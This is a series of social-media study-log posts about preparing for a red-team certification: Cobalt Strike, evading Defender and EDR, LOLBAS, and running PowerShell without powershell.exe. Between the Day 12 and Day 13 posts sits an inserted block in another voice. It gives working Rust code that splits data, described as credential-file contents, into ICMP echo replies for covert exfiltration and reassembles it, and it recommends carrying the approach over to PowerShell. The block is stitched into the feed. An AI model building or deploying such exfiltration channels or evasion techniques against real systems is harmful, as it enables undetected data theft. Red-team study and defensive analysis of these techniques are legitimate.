#hack100days Day 1. CRTO lab. Managing DNS is not my forte. Anyway, made some progress w/DNS and HTTP listeners.
#hack100days Day 2. More CRTO w/harder look at pivot listeners and their payloads.
#hack100days Day 3. More CRTO. Re-reviewed material on defeating Defender. Thinking through whether there are opportunities to incorporate some techniques learned from a couple of @[email protected] streams into the methodology. Maybe in the malleable C2 or in the Aggressor Scripts? More learnin' needed. #getSmart
#hack100days Day 4. More CRTO. Revisited the material on application whitelisting and LOLBAS. The placement in the material is off-putting. Seems like covering this material hand-in-glove with initial access would make more sense. Shooting for banging around in the lab tomorrow.
#hack100days Day 5. #StlCitySC was on tonight, so no CRTO lab. Revisited the ADCS section, though. Also did some AI prompting and looked at #Rust crates for ICMP. I am looking for a way to generate ICMP ECHO REPLY packets in #PowerShell or Rust. (Python isn't installed *everywhere*. Where I'm going has PowerShell or I can drop an executable.) This site is where I'm starting, but my Rust skills are not yet strong.
#hack100days Day 6. Revisited extending CS section. Definitely need to spend time with this stuff in the lab. Use of winapi could lead to trouble, so need to grok how to finesse that. Gotta hide from EDR.
#hack100days Day 7. Spent more time on extending #CobaltStrike section of #CRTO. Grokking that Aggressor Scripts are CS client extensions. Looked harder at Beacon Object Files, not sure if that's going to be important for the test, though. Found https://github.com/CCob/BOF.NET as a way to pull in some .Net, but it's not yet obvious to me how that works. Regardless. Must. Hit. The. Lab.
#hack100days Day 8. More time on #CRTO, finally got into the lab and worked on the Initial Compromise section. Got acquainted with [[https://github.com/dafthack/MailSniper|Mailsniper]]. (Reckon its utility is shrinking as OWA and Exchange install bases shrink.)
#hack100days Day 9. Got caught up on security newsletters. Pre-ordered a copy of Evading EDR from No Starch Press by Matt Hand (https://nostarch.com/evading-edr).
#hack100days Day 10. Back to #CRTO and the lab. More initial compromise and some host enumeration. #RedTeam #CobaltStrike
#hack100days Day 11. Compared and contrasted some "AI"s and their ability to generate code. Tested and confirmed some python3/scapy can send ICMP with a payload. Going to explore that some more tomorrow, along with a PowerShell version. Test will be using it as an exfiltration channel. #RedTeam
#hack100days Day 12. Spent some time on personal lab. Trying out Windows and UTM on MacBook Pro M2. Working on powershell version of ICMP exfil. #RedTeam
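The ICMP exfil channel the Day 5, 11 and 12 posts are working toward, as an added example that is not code from the original posts: it frames payload bytes into ICMP echo messages and reassembles them, using only the Rust standard library (no crates). Assumed for illustration: sender and receiver agree on an identifier (0x1337 here), chunks are numbered by the sequence field, and the sample data is a constructed string. Actually putting the packets on the wire needs a raw socket (root or CAP_NET_RAW) and is not shown; the point is the framing and the checks a receiver should do.

```rust
// Added example, not from the original posts: ICMP echo framing for a
// payload-carrying channel, standard library only. Sending requires a raw
// socket and is out of scope here; this shows building, checking and
// reassembling the messages.

const ICMP_ECHO_REPLY: u8 = 0;
const ICMP_ECHO_REQUEST: u8 = 8;
const ICMP_HDR_LEN: usize = 8;

/// RFC 1071 one's-complement checksum over an ICMP message. Verifying a
/// received message: the checksum over the whole message, checksum field
/// included, comes out as 0.
pub fn icmp_checksum(data: &[u8]) -> u16 {
    let mut sum: u32 = 0;
    let mut words = data.chunks_exact(2);
    for w in &mut words {
        sum += u32::from(u16::from_be_bytes([w[0], w[1]]));
    }
    if let [last] = words.remainder() {
        sum += u32::from(*last) << 8; // odd trailing byte is the high octet
    }
    while sum >> 16 != 0 {
        sum = (sum & 0xffff) + (sum >> 16); // end-around carry
    }
    !(sum as u16)
}

#[derive(Debug, PartialEq, Eq)]
pub struct Echo {
    pub kind: u8,
    pub id: u16,
    pub seq: u16,
    pub payload: Vec<u8>,
}

/// Serialize an echo request (type 8) or reply (type 0): type, code 0,
/// checksum, identifier, sequence number, then the payload bytes.
pub fn build_echo(kind: u8, id: u16, seq: u16, payload: &[u8]) -> Vec<u8> {
    let mut pkt = Vec::with_capacity(ICMP_HDR_LEN + payload.len());
    pkt.push(kind);
    pkt.push(0);
    pkt.extend_from_slice(&[0, 0]); // checksum, filled in below
    pkt.extend_from_slice(&id.to_be_bytes());
    pkt.extend_from_slice(&seq.to_be_bytes());
    pkt.extend_from_slice(payload);
    let csum = icmp_checksum(&pkt);
    pkt[2..4].copy_from_slice(&csum.to_be_bytes());
    pkt
}

/// Parse an echo message, rejecting short, non-echo or corrupted input.
pub fn parse_echo(pkt: &[u8]) -> Option<Echo> {
    if pkt.len() < ICMP_HDR_LEN || pkt[1] != 0 {
        return None;
    }
    if pkt[0] != ICMP_ECHO_REQUEST && pkt[0] != ICMP_ECHO_REPLY {
        return None;
    }
    if icmp_checksum(pkt) != 0 {
        return None;
    }
    Some(Echo {
        kind: pkt[0],
        id: u16::from_be_bytes([pkt[4], pkt[5]]),
        seq: u16::from_be_bytes([pkt[6], pkt[7]]),
        payload: pkt[ICMP_HDR_LEN..].to_vec(),
    })
}

/// Split data into echo replies of at most `chunk` payload bytes (chunk > 0),
/// one per sequence number. Replies rather than requests: an unsolicited
/// reply is not answered by the receiving host's own ICMP stack, so the
/// receiver collects them with a raw socket or packet capture instead.
pub fn frame_exfil(id: u16, data: &[u8], chunk: usize) -> Vec<Vec<u8>> {
    data.chunks(chunk)
        .enumerate()
        .map(|(i, c)| build_echo(ICMP_ECHO_REPLY, id, i as u16, c))
        .collect()
}

/// Receiver side: keep only packets for our identifier, drop anything
/// corrupted, order by sequence number so out-of-order delivery does not
/// scramble the data, and ignore duplicate sequence numbers.
pub fn reassemble_exfil(id: u16, pkts: &[Vec<u8>]) -> Vec<u8> {
    let mut frames: Vec<Echo> = pkts
        .iter()
        .filter_map(|p| parse_echo(p))
        .filter(|e| e.kind == ICMP_ECHO_REPLY && e.id == id)
        .collect();
    frames.sort_by_key(|e| e.seq);
    frames.dedup_by_key(|e| e.seq);
    frames.into_iter().flat_map(|e| e.payload).collect()
}

fn main() {
    // Constructed sample data, standing in for a file to exfiltrate.
    let secret = b"constructed sample: creds.txt contents go here";
    let pkts = frame_exfil(0x1337, secret, 16);
    let back = reassemble_exfil(0x1337, &pkts);
    assert_eq!(back, secret.to_vec());
    println!("{} packets, {} bytes round-tripped", pkts.len(), back.len());
}
```

The receiver-side checks are the part worth carrying over to a PowerShell or scapy version: a channel that trusts every echo payload it sees will happily mix in real ping traffic, so filtering on type, identifier and checksum before reassembling is what makes the stream usable.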
#hack100days Day 13. Busy day. Saw @securestep9 toot about #BugBountyTips that had this link: https://medium.com/@imshewale/complete-bug-bounty-recon-fundamentals-f283dee5c370 Checked it out and it has an extensive list of tools! So, reviewed that. Ran across a lot of familiar things and saw some new things, so that's useful.
#hack100days Day 14. Slacked a bit over the weekend. Read up on PowerShell, its relationship w/C#/.Net. Found some references to using C# to run PowerShell. Looked at msbuild.exe. I had a tab open talking about 'psattack', but the links to the GitHub page resulted in a 404. It looks like one could write a wrapper in C# that can call PowerShell w/out going through powershell.exe. Seems interesting. (Doing this because I didn't have enough time to bang around in the CRTO lab.) #RedTeam #LOLBAS #PowerShell
#hack100days Day 15, delayed. At a cybersecurity happy hour last night, spent some time brainstorming some techniques for "multiplexing" C2 or exfil. Runs the risk of re-implementing techniques from an app using UDP to cover dropped payloads, which runs the risk of beacon bloat. Fun thought experiment. #RedTeam
#hack100days Day 16. Watched Alh4zr3d's stream of taking a crack at TryHackMe's Red Team Capstone. #RedTeam #GetSmart

@scottlink there's a #PowerShell #SDK #NuGet https://www.nuget.org/packages/Microsoft.PowerShell.SDK/

You can create an instance of "PowerShell" and invoke code, or even host PowerShell for automating your app...

Not sure any of their examples still work though 😜 https://github.com/MicrosoftDocs/powershell-sdk-samples